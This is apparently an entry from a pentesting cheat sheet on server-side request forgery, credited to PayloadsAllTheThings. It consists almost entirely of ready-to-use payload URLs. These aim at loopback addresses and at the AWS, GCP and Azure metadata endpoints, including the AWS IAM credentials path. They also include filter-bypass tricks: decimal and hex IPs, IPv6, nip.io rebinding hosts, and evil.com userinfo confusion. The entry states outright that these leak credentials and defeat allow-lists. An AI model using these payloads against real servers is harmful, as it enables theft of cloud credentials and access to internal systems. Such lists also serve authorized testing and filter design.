Server-Side Request Forgery
Point the server inward. Cloud metadata endpoints leak credentials; the bypass block (decimal/hex IP, IPv6, enclosed-alphanumerics, DNS rebinding hosts) defeats common allow-list filters.
Tags: ssrf, cloud, metadata, bypass
Controlled probes
http://127.0.0.1/http://localhost:80/http://169.254.169.254/latest/meta-data/iam/security-credentials/http://169.254.169.254/latest/meta-data/ (AWS) · http://metadata.google.internal/computeMetadata/v1/ (GCP, needs Metadata-Flavor: Google)http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure, needs Metadata: true)http://[::1]/http://2130706433/http://0x7f000001/http://127.0.0.1.nip.io/http://localhost#@evil.com/http://evil.com@127.0.0.1/
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery